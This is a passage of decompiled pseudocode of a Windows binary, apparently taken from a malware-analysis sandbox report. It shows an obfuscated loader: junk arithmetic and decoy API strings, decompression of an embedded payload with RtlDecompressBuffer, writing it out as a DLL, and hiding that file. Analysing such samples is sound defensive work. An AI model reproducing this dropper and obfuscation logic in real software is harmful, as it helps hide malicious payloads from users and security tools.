                                                				intOrPtr _t523;
                                                				signed int _t524;
                                                				signed int _t525;
                                                				signed int _t526;
                                                				signed int _t533;
                                                				signed int _t539;
                                                				signed int _t540;
                                                				signed int _t541;
                                                				signed int _t545;
                                                				signed int _t546;
                                                				signed int _t556;
                                                				signed int _t557;
                                                				signed int _t559;
                                                				intOrPtr _t563;
                                                				signed int _t569;
                                                				signed int _t571;
                                                				signed int _t572;
                                                				signed int _t574;
                                                				signed int _t576;
                                                				signed int _t581;
                                                				signed int _t588;
                                                				signed int _t589;
                                                				signed int _t590;
                                                				signed int _t593;
                                                				signed int _t598;
                                                				signed int _t601;
                                                				signed int _t603;
                                                				signed int _t609;
                                                				signed int _t611;
                                                				signed int _t612;
                                                				void* _t624;
                                                				signed int _t642;
                                                				signed int _t644;
                                                				signed int _t646;
                                                				signed int _t648;
                                                				void* _t652;
                                                				signed int _t663;
                                                				signed int _t665;
                                                				signed int _t667;
                                                				signed int _t678;
                                                				signed int _t680;
                                                				signed int _t682;
                                                				signed int _t683;
                                                				signed int _t684;
                                                				signed int _t685;
                                                				signed int _t686;
                                                				signed int _t687;
                                                				signed int _t693;
                                                				signed int _t696;
                                                				signed int _t697;
                                                				signed int _t698;
                                                				signed int _t701;
                                                				signed int _t702;
                                                				signed int _t704;
                                                				signed int _t705;
                                                				signed int _t706;
                                                				signed int _t707;
                                                				signed int _t709;
                                                				signed int _t710;
                                                				signed int _t713;
                                                				signed int _t715;
                                                				signed int _t717;
                                                				signed int _t728;
                                                				signed int _t734;
                                                				intOrPtr _t738;
                                                				signed int _t739;
                                                				signed int _t747;
                                                				signed int _t749;
                                                				signed int _t752;
                                                				signed int _t754;
                                                				signed int _t755;
                                                				signed int _t756;
                                                				signed int _t757;
                                                				signed int _t760;
                                                				signed int _t781;
                                                				signed int _t784;
                                                				signed int _t785;
                                                				signed int _t794;
                                                				signed int _t795;
                                                				signed int _t796;
                                                				void* _t802;
                                                				signed int _t807;
                                                				intOrPtr _t808;
                                                				signed int _t812;
                                                				signed int _t822;
                                                				signed int _t825;
                                                				signed int _t828;
                                                				signed int _t829;
                                                				signed int _t830;
                                                				signed int _t839;
                                                				signed int _t840;
                                                				signed int _t843;
                                                				signed int _t845;
                                                				signed int _t847;
                                                				signed int _t862;
                                                				signed int _t867;
                                                				signed int _t872;
                                                				signed int _t875;
                                                				signed int _t877;
                                                				signed int _t878;
                                                				signed int _t882;
                                                				signed int _t886;
                                                				signed int _t888;
                                                				signed int _t889;
                                                				signed int _t891;
                                                				signed int _t899;
                                                				signed int _t903;
                                                				signed int _t912;
                                                				signed int _t913;
                                                				signed int _t914;
                                                				signed int _t919;
                                                				signed int _t921;
                                                				signed int _t924;
                                                				signed int _t926;
                                                				signed int _t928;
                                                				signed int _t934;
                                                				signed int _t937;
                                                				signed int _t944;
                                                				signed int _t945;
                                                				intOrPtr _t946;
                                                				signed int _t949;
                                                				signed int _t950;
                                                				signed int _t952;
                                                				signed int _t953;
                                                				signed int _t954;
                                                				signed int _t956;
                                                				signed int _t957;
                                                				signed int _t969;
                                                				signed int _t970;
                                                				signed int _t972;
                                                				signed int _t974;
                                                				intOrPtr _t976;
                                                				signed int _t978;
                                                				signed int _t983;
                                                				intOrPtr _t984;
                                                				signed int _t985;
                                                				signed int _t986;
                                                				signed int _t990;
                                                				signed int _t1004;
                                                				signed int _t1007;
                                                				signed int _t1013;
                                                				signed int _t1015;
                                                				signed int _t1017;
                                                				signed int _t1018;
                                                				intOrPtr _t1022;
                                                				signed int _t1024;
                                                				signed int _t1025;
                                                				signed int _t1027;
                                                				void* _t1035;
                                                				signed int _t1038;
                                                				signed int _t1044;
                                                				signed int _t1046;
                                                				intOrPtr _t1065;
                                                				signed int* _t1081;
                                                				signed int _t1085;
                                                				signed int _t1086;
                                                				intOrPtr _t1090;
                                                				signed int _t1098;
                                                				intOrPtr _t1111;
                                                				void* _t1119;
                                                				intOrPtr _t1126;
                                                				signed int _t1134;
                                                				signed int _t1145;
                                                				signed int _t1146;
                                                				intOrPtr _t1152;
                                                				intOrPtr _t1153;
                                                				void* _t1163;
                                                				void* _t1169;
                                                				void* _t1172;
                                                				void* _t1179;
                                                				void* _t1185;
                                                				void* _t1201;
                                                				void* _t1205;
                                                				void* _t1207;
                                                				signed int _t1217;
                                                				void* _t1222;
                                                				void* _t1227;
                                                				void* _t1229;
                                                				void* _t1237;
                                                				void* _t1242;
                                                				signed int _t1244;
                                                				void* _t1254;
                                                				void* _t1257;
                                                				void* _t1259;
                                                				void* _t1261;
                                                
                                                				_t1261 = __fp0;
                                                				_t1150 = __esi;
                                                				_t1149 = __edi;
                                                				_t1034 = __ebx;
                                                				_t1152 = _t1153;
                                                				_t1035 = 0x5e;
                                                				do {
                                                					_push(0);
                                                					_push(0);
                                                					_t1035 = _t1035 - 1;
                                                				} while (_t1035 != 0);
                                                				_push(_t1035);
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v8 = __eax;
                                                				_push(_t1152);
                                                				_push(0x4f99b2);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t1153;
                                                				if(_v8 != 1) {
                                                					__eflags = 0;
                                                					_pop(_t1065);
                                                					 *[fs:eax] = _t1065;
                                                					_push(E004F99B9);
                                                					E004069F0( &_v760);
                                                					E004069A8( &_v756);
                                                					E00406A68( &_v752, 3);
                                                					E004069F0( &_v724);
                                                					E004069A8( &_v720);
                                                					E00406A68( &_v716, 2);
                                                					E00406A08( &_v100, 2);
                                                					return E00406A08( &_v28, 5);
                                                				} else {
                                                					_v52 = _v32 + 0xb2;
                                                					asm("fild dword [ebp-0x28]");
                                                					_v48 = E004048D8();
                                                					if(_v56 + 0x85 >= _v36) {
                                                						asm("fild dword [0x4fef0c]");
                                                						 *0x4feefc = E004048CC();
                                                					} else {
                                                						_v60 = 0;
                                                						do {
                                                							E00406CF4( &_v12, L"ZwQueryOpenSubKeys");
                                                							_v60 = _v60 + 1;
                                                							_t1158 = _v60 - 0xe;
                                                						} while (_v60 != 0xe);
                                                					}
                                                					_push(_v52);
                                                					_push(_v40);
                                                					_push(_v36);
                                                					_t1038 =  *0x4fef30; // 0xa1d816
                                                					E004F5954(_v52, _t1034, _t1038, _v44, _t1158);
                                                					if(E00407774(L"EP0NRE9C.DLL", 1, _v24) < 0x3a) {
                                                						asm("fild dword [0x4feed0]");
                                                						 *0x4fef3c = E004048CC();
                                                					}
                                                					_push(_t1152);
                                                					_push(0x4f9861);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t1153;
                                                					_t501 =  *0x4fef28; // 0x3c79b5d4
                                                					 *0x4feecc = _t501;
                                                					_t502 = E004FEED0; // 0xc3c34ef0
                                                					E004FEED0 = E0040489C(_t502);
                                                					_v32 = 9 - _v40;
                                                					_v708 = _v56 + 4;
                                                					asm("fild dword [ebp-0x2c0]");
                                                					_v36 = E004048D8();
                                                					_t509 = E004FEF20; // 0x6e687a1a
                                                					 *0x4fef04 = _t509 - 6;
                                                					asm("fild dword [0x4fef18]");
                                                					 *0x4fef28 = E004048CC();
                                                					_v80 = 0xfde8;
                                                					_v60 = 0;
                                                					do {
                                                						E00406CF4( &_v12, _v16);
                                                						if(_v32 - _v52 >= 0xd4) {
                                                							_t518 = _v44 - _v36;
                                                							__eflags = _t518;
                                                							_v40 = _t518;
                                                						} else {
                                                							E004FEED0 = E004F5038( &_v48,  &E004FEF0C,  &E004FEF0C,  &E004FEF10,  &E004FEF20);
                                                						}
                                                						_t519 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4fef14 = _t519;
                                                						_v48 = 0;
                                                						while(_v48 < 4) {
                                                							_v48 = _v48 + 1;
                                                							_t1022 =  *0x4feeec; // 0xb52124f2
                                                							_t1163 = _t1022 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                							if(_t1163 != 0) {
                                                								_t1024 =  *0x4fef40; // 0x3c79b5d4
                                                								_t1025 = _t1024 - E004FEF0C;
                                                								__eflags = _t1025;
                                                								E004FEF20 = _t1025;
                                                							} else {
                                                								_v56 = 0;
                                                								while(_v56 < 0xa) {
                                                									_v56 = _v56 + 1;
                                                									_t1027 = E004FEF00; // 0xa3b3f6c0
                                                									 *0x4feed8 = _t1027;
                                                								}
                                                							}
                                                						}
                                                						_v60 = _v60 + 1;
                                                					} while (_v60 != 0xc);
                                                					_t1168 = 0x5b -  *0x4fef44 - 0x19;
                                                					if(0x5b -  *0x4fef44 < 0x19) {
                                                						_t1017 = E004FEF20; // 0x6e687a1a
                                                						 *0x4feea0 = _t1017;
                                                						_t1145 =  *0x4fef30; // 0xa1d816
                                                						_t1018 =  *0x4fef44; // 0x38993
                                                						E004FEF00 = E004F5234(_t1018, _v48, _t1145, _t1168);
                                                						_t1146 = E004FEF2C; // 0xa1d900
                                                						E004F7B00(_v44, _t1146, _t1168);
                                                					}
                                                					_t523 =  *0x4feeec; // 0xb52124f2
                                                					 *0x4feeec = _t523;
                                                					_t524 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4feef0 = _t524;
                                                					_t525 =  *0x4feef0; // 0x44632301
                                                					_t1169 = _t525 -  *0x4feeec; // 0xb52124f2
                                                					if(_t1169 <= 0) {
                                                						_t526 = E004FEF2C; // 0xa1d900
                                                						E004FEF2C = E0040489C(_t526);
                                                					} else {
                                                						_t1015 =  *0x4fef44; // 0x38993
                                                						E004FEF10 = _t1015 * E004FEF00;
                                                					}
                                                					 *0x4fef44 =  *0x4fef40 * 0xe2;
                                                					E004EDCA8();
                                                					_v48 = _v40;
                                                					_v60 = _v56 - 0x90;
                                                					_t533 =  *0x4fef18; // 0xbc3e19a
                                                					 *0x4fef40 = _t533 + 0x3f;
                                                					 *0x4feecc =  *0x4fef14 * 0xa3;
                                                					if(_v32 - _v56 < 0x44) {
                                                						_t1013 =  *0x4feee0; // 0x747938b
                                                						 *0x4feef0 = _t1013 *  *0x4fef40; // executed
                                                					}
                                                					E004EE96C(_t1034, _t1149, _t1150);
                                                					_t539 =  *0x4fef3c; // 0x1cb932a9
                                                					E004FEF34 = _t539;
                                                					_t540 =  *0x4fef28; // 0x3c79b5d4
                                                					E004FEF38 = _t540;
                                                					_t541 = E004FEF34; // 0xc3c34ef0
                                                					_t1172 = _t541 - E004FEF38; // 0xc3c34fdc
                                                					if(_t1172 < 0) {
                                                						_v60 = 0;
                                                						while(_v60 < 0xf) {
                                                							_v60 = _v60 + 1;
                                                							E00406CF4( &_v12, L"AlpcGetMessageAttribute");
                                                						}
                                                					}
                                                					_v36 = 0;
                                                					while(_v36 < 1) {
                                                						_v36 = _v36 + 1;
                                                						_v40 = _v44 + _v52;
                                                					}
                                                					_v48 = _v32 - _v56;
                                                					_t545 =  *0x4fef40; // 0x3c79b5d4
                                                					 *0x4fef28 = _t545;
                                                					_t546 =  *0x4feea0; // 0xa1d900
                                                					 *0x4fef3c = _t546 + 0xf8;
                                                					E00407678(_v24, 3, 1,  &_v28);
                                                					_v76 = 0;
                                                					do {
                                                						_v40 = _v32 * _v60;
                                                						_v44 = _v56 + 4;
                                                						_t556 =  *0x4feeec; // 0xb52124f2
                                                						E004FEF10 = _t556;
                                                						_t557 =  *0x4feee8; // 0xdcd0f434
                                                						E004FEF2C = _t557 + 0x22;
                                                						_t559 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef44 = _t559 - 0x86;
                                                						E00406CF4( &_v28, _v28);
                                                						_t563 =  *0x4fefac; // 0x4fe544
                                                						 *((char*)(_t1152 + _v76 - 0x2bc)) =  *((intOrPtr*)(_t563 + _v76 * 4)) - 0x92;
                                                						_v76 = _v76 + 1;
                                                					} while (_v76 != 0x254);
                                                					_v40 = (_v52 << 7) + _v52;
                                                					_t569 =  *0x4feea0; // 0xa1d900
                                                					_t1179 = _t569 +  *0x4fef04 -  *0x4fef04; // 0x43c14963
                                                					if(_t1179 != 0) {
                                                						_t571 = E004FEF50; // 0xa3b3f6c0
                                                						_t572 = _t571 *  *0x4feefc;
                                                						__eflags = _t572;
                                                						E004FEF34 = _t572;
                                                					} else {
                                                						_v44 = _v56 - 0x9b;
                                                						E00406CF4( &_v24, L"sspicli.dll");
                                                						_v32 = 0;
                                                						do {
                                                							if(_v56 + _v32 < _v32 + _v56) {
                                                								_v48 = 0;
                                                								do {
                                                									_t1007 =  *0x4fef48; // 0xc3c34ef0
                                                									 *0x4feea0 = _t1007;
                                                									_v48 = _v48 + 1;
                                                								} while (_v48 != 3);
                                                							}
                                                							_v32 = _v32 + 1;
                                                						} while (_v32 != 0xd);
                                                						_t1004 =  *0x4fef44; // 0x38993
                                                						E004FEF00 = _t1004 - E004FEF20;
                                                					}
                                                					asm("fild dword [0x4fef28]");
                                                					 *0x4feea0 = E004048D8();
                                                					_t574 = E004FEF38; // 0xc3c34fdc
                                                					 *0x4feedc = _t574 + E004FEF38;
                                                					_t576 =  *0x4fef04; // 0x43c14963
                                                					 *0x4feee8 = _t576;
                                                					E004FEF00 = 0x6c - E004FEF20;
                                                					_v68 = E004044B4(0x157a00);
                                                					_t581 = E004FEF38; // 0xc3c34fdc
                                                					_t1185 = _t581 - E004FEF20 - E004FEF38; // 0xc3c34fdc
                                                					if(_t1185 < 0) {
                                                						_v56 = 0;
                                                						while(_v56 < 0) {
                                                							_v56 = _v56 + 1;
                                                							E00406CF4( &_v12, L"SetProcessAffinityMask");
                                                						}
                                                						E00406CF4( &_v12, _v20);
                                                					}
                                                					_v40 = _v52 - _v44;
                                                					_v60 = _v48 + 0xcf;
                                                					if(_v44 <= _v56) {
                                                						_t588 = E004FEF34; // 0xc3c34ef0
                                                						_t589 = _t588 - 0x28;
                                                						__eflags = _t589;
                                                						 *0x4feea0 = _t589;
                                                					} else {
                                                						_t990 = E004FEF20; // 0x6e687a1a
                                                						E004FEF2C = _t990 *  *0x4feee0;
                                                					}
                                                					_t590 =  *0x4feefc; // 0x4b08dcc7
                                                					_v708 = _t590 + 4;
                                                					asm("fild dword [ebp-0x2c0]");
                                                					 *0x4feeec = E004048D8();
                                                					_t593 =  *0x4feefc; // 0x4b08dcc7
                                                					E004FEF0C = _t593 + 0xbd;
                                                					_v72 = E004044B4(0x157a00);
                                                					_v56 = 0;
                                                					while(_v56 < 2) {
                                                						_v56 = _v56 + 1;
                                                						_t984 =  *0x4feec4; // 0x0
                                                						_v104 = _t984;
                                                						if(_v104 != 0) {
                                                							_v104 =  *((intOrPtr*)(_v104 - 4));
                                                						}
                                                						if(_v104 != 0x83) {
                                                							_t985 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4feee8 = _t985;
                                                						} else {
                                                							_t986 =  *0x4fef4c; // 0x43c1493c
                                                							E004FEED0 = _t986;
                                                						}
                                                					}
                                                					_t598 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef04 = _t598;
                                                					_v44 = _v60 * _v52;
                                                					_t601 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef14 = _t601;
                                                					_v48 = 0;
                                                					while(_v48 < 3) {
                                                						_v48 = _v48 + 1;
                                                						_t978 =  *0x4fef30; // 0xa1d816
                                                						_t1134 = E004FEF00; // 0xa3b3f6c0
                                                						if(_t978 +  *0x4fef14 >= _t1134 +  *0x4fef30) {
                                                							__eflags = 0x76;
                                                							E004FEF00 = 0x76 - E004FEF38;
                                                						} else {
                                                							_v32 = 0;
                                                							while(_v32 < 6) {
                                                								_v32 = _v32 + 1;
                                                								_t983 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feea0 = _t983;
                                                							}
                                                						}
                                                					}
                                                					_t603 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF38 = _t603 - E004FEF50;
                                                					_push(_t1152);
                                                					_push(0x4f97e9);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t1153;
                                                					_v36 = _v32 + 0x96;
                                                					_v40 = 0;
                                                					while(_v40 < 0xd) {
                                                						_v40 = _v40 + 1;
                                                						_v708 = _v60 + 0x4a;
                                                						asm("fild dword [ebp-0x2c0]");
                                                						_v44 = E004048CC();
                                                						_v52 = 0;
                                                						if(_v52 < 0xd) {
                                                							_v52 = _v52 + 1;
                                                							_t976 =  *0x4feeec; // 0xb52124f2
                                                							E004FEF50 = _t976 - E004FEF50;
                                                						}
                                                						_t969 = E004FEF20; // 0x6e687a1a
                                                						E004FEED0 = _t969;
                                                						_t970 =  *0x4feedc; // 0xbc3e19a
                                                						 *0x4feedc = E0040489C(_t970);
                                                						_t972 = E004FEED0; // 0xc3c34ef0
                                                						_t1201 = _t972 -  *0x4feedc; // 0xbc3e19a
                                                						if(_t1201 > 0) {
                                                							_t974 =  *0x4fef30; // 0xa1d816
                                                							 *0x4fef04 = _t974 * E004FEED0;
                                                						}
                                                						asm("fild dword [0x4feefc]");
                                                						E004FEF2C = E004048D8();
                                                						_t1203 = _v40 - 0xd;
                                                					}
                                                					_t609 = E004FEF50; // 0xa3b3f6c0
                                                					 *0x4fef4c = _t609 - 0xc2;
                                                					_t611 = E004FEF0C; // 0xb52124bf
                                                					 *0x4feea0 = _t611;
                                                					_t612 =  *0x4fef28; // 0x3c79b5d4
                                                					_v708 = _t612 + 0xf3;
                                                					asm("fild dword [ebp-0x2c0]");
                                                					 *0x4feee0 = E004048CC();
                                                					_push( &_v56);
                                                					_push( &_v44);
                                                					_push(0x4feef0);
                                                					_t1081 =  &_v60;
                                                					 *0x4feedc = E004F4700(0x4feed8, _t1034,  &_v44, _t1081, _t1203);
                                                					_v76 = 0xd3a74;
                                                					asm("cdq");
                                                					_push(_t1081);
                                                					_push(_v76);
                                                					_t624 = _v64 - 0xbb7;
                                                					if(0 == _v92) {
                                                						_t1205 = _t624 - _v96;
                                                					}
                                                					if(_t1205 == 0) {
                                                						_v60 = 0;
                                                						do {
                                                							E00407678(_v28, 4, 1,  &_v12);
                                                							_t912 =  *0x4fef14; // 0xb52124ca
                                                							 *0x4feed8 = _t912;
                                                							_t913 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feedc = _t913;
                                                							_t914 =  *0x4feedc; // 0xbc3e19a
                                                							_t1207 = _t914 -  *0x4feed8; // 0x1cb9338e
                                                							if(_t1207 > 0) {
                                                								_v40 = _v44 + _v48;
                                                							}
                                                							_v52 = _v56 + 0x3b;
                                                							E00406CF4( &_v20, L"ZwYieldExecution");
                                                							_v60 = _v60 + 1;
                                                						} while (_v60 != 6);
                                                						_t919 = E004FEF34; // 0xc3c34ef0
                                                						E004FEF34 = E0040489C(_t919);
                                                						_t921 = E004FEED0; // 0xc3c34ef0
                                                						_v708 = _t921 + 4;
                                                						asm("fild dword [ebp-0x2c0]");
                                                						 *0x4fef4c = E004048D8();
                                                						_t924 =  *0x4feecc; // 0xd26bafe0
                                                						 *0x4feed8 = _t924 + 0xab;
                                                						_t926 =  *0x4feecc; // 0xd26bafe0
                                                						 *0x4feef4 = _t926 << 4;
                                                						_t928 =  *0x4feee0; // 0x747938b
                                                						E004FEF0C = _t928 - 0xe;
                                                						_v76 = 0;
                                                						do {
                                                							_t1126 =  *0x4fef24; // 0x0
                                                							if(E00407774(L"QueryTraceA", 1, _t1126) >= 0x67) {
                                                								_t934 = _v32 - _v52;
                                                								__eflags = _t934;
                                                								_v40 = _t934;
                                                								E00406CF4( &_v20, _v12);
                                                							} else {
                                                								_v36 = _v48 * _v44;
                                                							}
                                                							_t937 = E004FEF00; // 0xa3b3f6c0
                                                							_v708 = _t937 + 4;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							E004FEF34 = E004048D8();
                                                							E00406CF4( &_v24, _v12);
                                                							E00406CF4( &_v28, L"RegDeleteKeyW");
                                                							_t944 = E004FEF2C; // 0xa1d900
                                                							 *0x4feecc = _t944;
                                                							_t945 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4feed8 = _t945;
                                                							_t946 =  *0x4fefa0; // 0x4fe524
                                                							 *((char*)(_t946 + _v76)) = 0x7a;
                                                							_v76 = _v76 + 1;
                                                						} while (_v76 != 0x20);
                                                						asm("fild dword [ebp-0x34]");
                                                						_v48 = E004048CC();
                                                						_v52 = 0;
                                                						while(_v52 < 7) {
                                                							_v52 = _v52 + 1;
                                                							_v44 = 0;
                                                							while(_v44 < 4) {
                                                								_v44 = _v44 + 1;
                                                								E00407678(_v16, 1, 1,  &_v12);
                                                							}
                                                							_t956 =  *0x4fef30; // 0xa1d816
                                                							 *0x4feedc = _t956;
                                                							_t957 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feee8 = _t957;
                                                						}
                                                						_t949 =  *0x4fef30; // 0xa1d816
                                                						 *0x4feef4 = _t949;
                                                						_t950 = E004FEF10; // 0x1cb931c0
                                                						 *0x4fef18 = _t950 + 4;
                                                						_t952 =  *0x4fef28; // 0x3c79b5d4
                                                						_t953 = _t952 + 0x20;
                                                						_t1217 = _t953;
                                                						 *0x4fef30 = _t953;
                                                						_t954 =  *0x4feedc; // 0xbc3e19a
                                                						 *0x4fef3c = _t954;
                                                					}
                                                					 *0x4feef4 = E004F3F2C( &E004FEF0C,  &_v60,  &E004FEF38, _t1217,  &_v56, 0x4feefc,  &_v52,  &E004FEF2C);
                                                					_v36 = 0x95 - _v56;
                                                					_v40 = 0;
                                                					_t1218 = _v40 - 3;
                                                					if(_v40 < 3) {
                                                						_v40 = _v40 + 1;
                                                						_v44 = _v32 - 0xa;
                                                					}
                                                					asm("fild dword [0x4fef2c]");
                                                					 *0x4fef3c = E004048CC();
                                                					_t1044 =  *0x4fef48; // 0xc3c34ef0
                                                					_t1085 =  *0x4fef40; // 0x3c79b5d4
                                                					 *0x4fef40 = E004F5234(_v44, _t1044, _t1085, _t1218);
                                                					_t1086 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef3c = E004F827C(_v44, _t1086);
                                                					E00404658(0x41a22c, _t1034, _v76, _v68);
                                                					_v40 = _v56 + 4;
                                                					_v44 = 0;
                                                					while(_v44 < 4) {
                                                						_v44 = _v44 + 1;
                                                						asm("fild dword [0x4fef34]");
                                                						 *0x4fef30 = E004048D8();
                                                						_t1220 = _v44 - 4;
                                                					}
                                                					_t642 =  *0x4feecc; // 0xd26bafe0
                                                					 *0x4fef40 = _t642;
                                                					_push(_v52);
                                                					_t1046 =  *0x4fef44; // 0x38993
                                                					_t644 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef48 = E004EE798(_t644, _t1034, _t1046, _v32, _t1220);
                                                					_t646 =  *0x4fef30; // 0xa1d816
                                                					E004FEED0 = _t646 + 0x6e;
                                                					_t648 = E004FEF2C; // 0xa1d900
                                                					 *0x4feef0 = _t648 - 0xd2;
                                                					_t652 = E004F0FBC( &_v704, _t1034,  &_v72, _v68, _t1149, _t1150,  &_v76); // executed
                                                					if(_t652 != 0) {
                                                						_t701 =  *0x4fef4c; // 0x43c1493c
                                                						E004FEF38 = _t701;
                                                						_t702 =  *0x4fef3c; // 0x1cb932a9
                                                						 *0x4fef3c = E0040489C(_t702);
                                                						_t704 = E004FEF38; // 0xc3c34fdc
                                                						_t1222 = _t704 -  *0x4fef3c; // 0x1cb932a9
                                                						if(_t1222 >= 0) {
                                                							_t705 =  *0x4feef4; // 0xb52124ca
                                                							_t706 = _t705 + 4;
                                                							__eflags = _t706;
                                                							 *0x4feea0 = _t706;
                                                						} else {
                                                							_v60 = 0;
                                                							do {
                                                								_t899 = E004FEF20; // 0x6e687a1a
                                                								 *0x4feecc = _t899;
                                                								_v60 = _v60 + 1;
                                                							} while (_v60 != 2);
                                                							_v36 = _v32 * _v56;
                                                							_v40 = 0;
                                                							while(_v40 < 6) {
                                                								_v40 = _v40 + 1;
                                                								_t903 =  *0x4fef14; // 0xb52124ca
                                                								E004FEF20 = _t903 + 0x91;
                                                							}
                                                						}
                                                						_t707 =  *0x4fef48; // 0xc3c34ef0
                                                						_t1227 = _t707 +  *0x4feedc -  *0x4feedc; // 0xbc3e19a
                                                						if(_t1227 != 0) {
                                                							_t709 = E004FEF34; // 0xc3c34ef0
                                                							_t710 = _t709 +  *0x4feefc;
                                                							__eflags = _t710;
                                                							E004FEF2C = _t710;
                                                							E004FEF00 = E004F0EBC( &E004FEF38,  &E004FEF20, __eflags);
                                                						} else {
                                                							asm("fild dword [0x4feeec]");
                                                							E004FEF00 = E004048CC();
                                                						}
                                                						_t713 =  *0x4fef44; // 0x38993
                                                						 *0x4feea0 = _t713 -  *0x4feed8;
                                                						_t715 =  *0x4fef40; // 0x3c79b5d4
                                                						 *0x4feee0 = _t715 + 0xe7;
                                                						_t717 =  *0x4fef3c; // 0x1cb932a9
                                                						E004FEF00 = _t717 - 0x4c;
                                                						_push( &_v32);
                                                						_push( &E004FEF10);
                                                						_push( &_v36);
                                                						E004FEF0C = E004F4700(0x4fef40, _t1034,  &_v36,  &_v32, _t1227);
                                                						if(RtlDecompressBuffer(2, _v68, 0x157a00, _v72, _v76,  &_v64) == 0) {
                                                							_v32 = _v60 * _v52;
                                                							_v36 = _v44 - 0x8d;
                                                							_t747 =  *0x4fef40; // 0x3c79b5d4
                                                							E004FEF10 = _t747 -  *0x4feee0;
                                                							_t749 =  *0x4fef40; // 0x3c79b5d4
                                                							_v708 = _t749 + 0xa5;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							E004FEF2C = E004048CC();
                                                							_t752 = E004FEF38; // 0xc3c34fdc
                                                							E004FEF38 = E0040489C(_t752);
                                                							_t754 =  *0x4feedc; // 0xbc3e19a
                                                							 *0x4fef3c = _t754;
                                                							_t755 = E004FEF38; // 0xc3c34fdc
                                                							_t1229 = _t755 -  *0x4fef3c; // 0x1cb932a9
                                                							if(_t1229 >= 0) {
                                                								_t756 =  *0x4fef30; // 0xa1d816
                                                								 *0x4fef3c = _t756;
                                                								_t757 =  *0x4fef3c; // 0x1cb932a9
                                                								__eflags = _t757 -  *0x4fef3c; // 0x1cb932a9
                                                								if(__eflags >= 0) {
                                                									E00406CF4( &_v12, _v16);
                                                								} else {
                                                									_t886 = E004FEF50; // 0xa3b3f6c0
                                                									E004FEF50 = E0040489C(_t886);
                                                									_t888 =  *0x4fef3c; // 0x1cb932a9
                                                									__eflags = _t888 - E004FEF50; // 0xa3b3f6c0
                                                									if(__eflags <= 0) {
                                                										_t889 =  *0x4feed8; // 0x1cb9338e
                                                										E004FEF2C = _t889 - 0xc3;
                                                									} else {
                                                										_t891 =  *0x4feedc; // 0xbc3e19a
                                                										 *0x4feef0 = _t891 -  *0x4fef28;
                                                									}
                                                								}
                                                							} else {
                                                								if(E00407774(L"logscrpt.dll", 1, _v28) == 0x33) {
                                                									asm("fild dword [0x4feee8]");
                                                									 *0x4fef14 = E004048D8();
                                                								} else {
                                                									 *0x4feee8 =  *0x4fef4c * 0x6c;
                                                								}
                                                							}
                                                							_t760 =  *0x4feea0; // 0xa1d900
                                                							E004FEF00 = _t760 - 0x55;
                                                							E00404814(0,  &_v720, _t1152);
                                                							E00407414( &_v716, _v720);
                                                							E004F37A4(_v716, _t1034,  &_v712, _t1149, _t1150); // executed
                                                							E004070C8( &_v712, L".dll");
                                                							E00407400( &_v96, _v712);
                                                							_v60 = 0;
                                                							do {
                                                								E00406CF4( &_v12, L"D3DCompiler_47.dll");
                                                								_v60 = _v60 + 1;
                                                							} while (_v60 != 0x10);
                                                							_v36 = 0;
                                                							do {
                                                								_v40 = _v44 + 0xa2;
                                                								_v708 = _v48 + 4;
                                                								asm("fild dword [ebp-0x2c0]");
                                                								_v52 = E004048D8();
                                                								_v36 = _v36 + 1;
                                                								_t1234 = _v36 - 0xd;
                                                							} while (_v36 != 0xd);
                                                							_t781 =  *0x4fef44; // 0x38993
                                                							E004FEF34 = _t781 + 0x14;
                                                							 *0x4fef14 = E004F6738();
                                                							_t784 =  *0x4feee0; // 0x747938b
                                                							 *0x4fef40 = _t784;
                                                							_t785 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4feea0 = _t785 + 0xab;
                                                							E004F7D2C(_v68, _t1034, _v64, _t1149, _t1150); // executed
                                                							_v44 = _v60 + 0x40;
                                                							E00406CF4( &_v20, L"vpnikeapi.dll");
                                                							_v52 = _v56 * 0xb;
                                                							_t794 =  *0x4feeec; // 0xb52124f2
                                                							E004FEF38 = _t794;
                                                							_t795 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4fef3c = _t795;
                                                							_t796 =  *0x4fef44; // 0x38993
                                                							_v708 = _t796 + 4;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							 *0x4feea0 = E004048D8();
                                                							E00407414( &_v724, _v96);
                                                							_t802 = E004F684C(_v724, _t1034, _v64, _v68, _t1234); // executed
                                                							if(_t802 != 0) {
                                                								_v48 = _v36 + 0xcf;
                                                								_t822 =  *0x4fef3c; // 0x1cb932a9
                                                								 *0x4fef18 = _t822;
                                                								_v44 = _v32 - _v40;
                                                								_t825 =  *0x4feed8; // 0x1cb9338e
                                                								_v708 = _t825 + 4;
                                                								asm("fild dword [ebp-0x2c0]");
                                                								 *0x4fef44 = E004048D8();
                                                								_t828 =  *0x4fef44; // 0x38993
                                                								_t829 = _t828 * E004FEED0;
                                                								E004FEED0 = _t829;
                                                								_t830 =  *0x4fef18; // 0xbc3e19a
                                                								 *0x4feee0 = _t830;
                                                								SetFileAttributesW(E00407330(_v96), 2); // executed
                                                								asm("fild dword [ebp-0x1c]");
                                                								_v48 = E004048CC();
                                                								E00407640(_v24, _v12);
                                                								if(_t829 != 0) {
                                                									E004FEF10 = 0xb0 - E004FEF50;
                                                									_t839 =  *0x4fef4c; // 0x43c1493c
                                                									_t840 = _t839 << 2;
                                                									__eflags = _t840;
                                                									E004FEF2C = _t840 + _t840 * 4;
                                                								} else {
                                                									_t872 = E004FEF34; // 0xc3c34ef0
